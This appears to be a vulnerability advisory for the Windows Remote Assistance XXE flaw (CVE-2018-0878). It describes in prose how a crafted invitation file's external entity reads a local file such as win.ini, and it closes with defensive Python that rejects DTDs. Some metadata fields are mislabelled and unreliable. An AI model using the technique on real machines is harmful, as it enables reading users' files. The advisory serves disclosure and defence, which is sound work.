vendor: Windows
by: Nabeel Ahmed
CVSS: 3.1 (LOW)
CWE: 611 (XXE)
Product Name: Windows
Affected Version From: Windows 7 (x64)
Affected Version To: Windows 10 (x64)
Patch Exists: YES
Related CWE: CVE-2018-0878
CPE: o:microsoft:windows
Other Scripts: N/A
Platforms Tested: Windows 7 (x64), Windows 10 (x64)
2018
Microsoft Windows Remote Assistance XXE
The Invitation.msrcincident file contains an XML document whose DOCTYPE declaration references an external entity. That external entity is used to include the contents of a file from the local system. The xxe.xml file contains an entity that is used to include the contents of the win.ini file from the local system.
Mitigation:
Disable external entity references in XML documents, and disable DTDs in XML documents.
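The mitigation above, sketched as an added example (not code from the original advisory or from Microsoft): a Python wrapper around expat that refuses any document carrying a DOCTYPE or entity declaration before its content is processed. The sample documents and their element names are constructed for illustration and are not the real invitation schema.

```python
import xml.parsers.expat


class UnsafeXML(ValueError):
    """Raised when a document declares a DTD or any entity."""


def parse_without_dtd(data: bytes) -> list:
    """Parse XML, refusing DOCTYPE and entity declarations.

    Returns the element names seen, in document order.
    Malformed XML still raises xml.parsers.expat.ExpatError.
    """
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        # Fires as soon as "<!DOCTYPE" is seen, before any entity is defined.
        raise UnsafeXML(f"DOCTYPE {name!r} is not allowed")

    def forbid_entity(name, is_param, value, base, system_id, public_id, notation):
        # Defence in depth: internal and external entity declarations.
        raise UnsafeXML(f"entity {name!r} is not allowed")

    def forbid_external(context, base, system_id, public_id):
        # Defence in depth: never fetch an external entity.
        raise UnsafeXML(f"external entity {system_id!r} is not allowed")

    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.EntityDeclHandler = forbid_entity
    parser.ExternalEntityRefHandler = forbid_external
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


# Constructed samples (hypothetical element names).
BENIGN = b'<?xml version="1.0"?><invite><session id="1"/></invite>'
WITH_DOCTYPE = b'<?xml version="1.0"?><!DOCTYPE invite SYSTEM "placeholder.dtd"><invite/>'

if __name__ == "__main__":
    print(parse_without_dtd(BENIGN))
    try:
        parse_without_dtd(WITH_DOCTYPE)
    except UnsafeXML as exc:
        print("rejected:", exc)
```

Running the same check over an invitation file before it is opened lets a mail or file gateway drop documents that declare a DTD at all, which covers both halves of the mitigation.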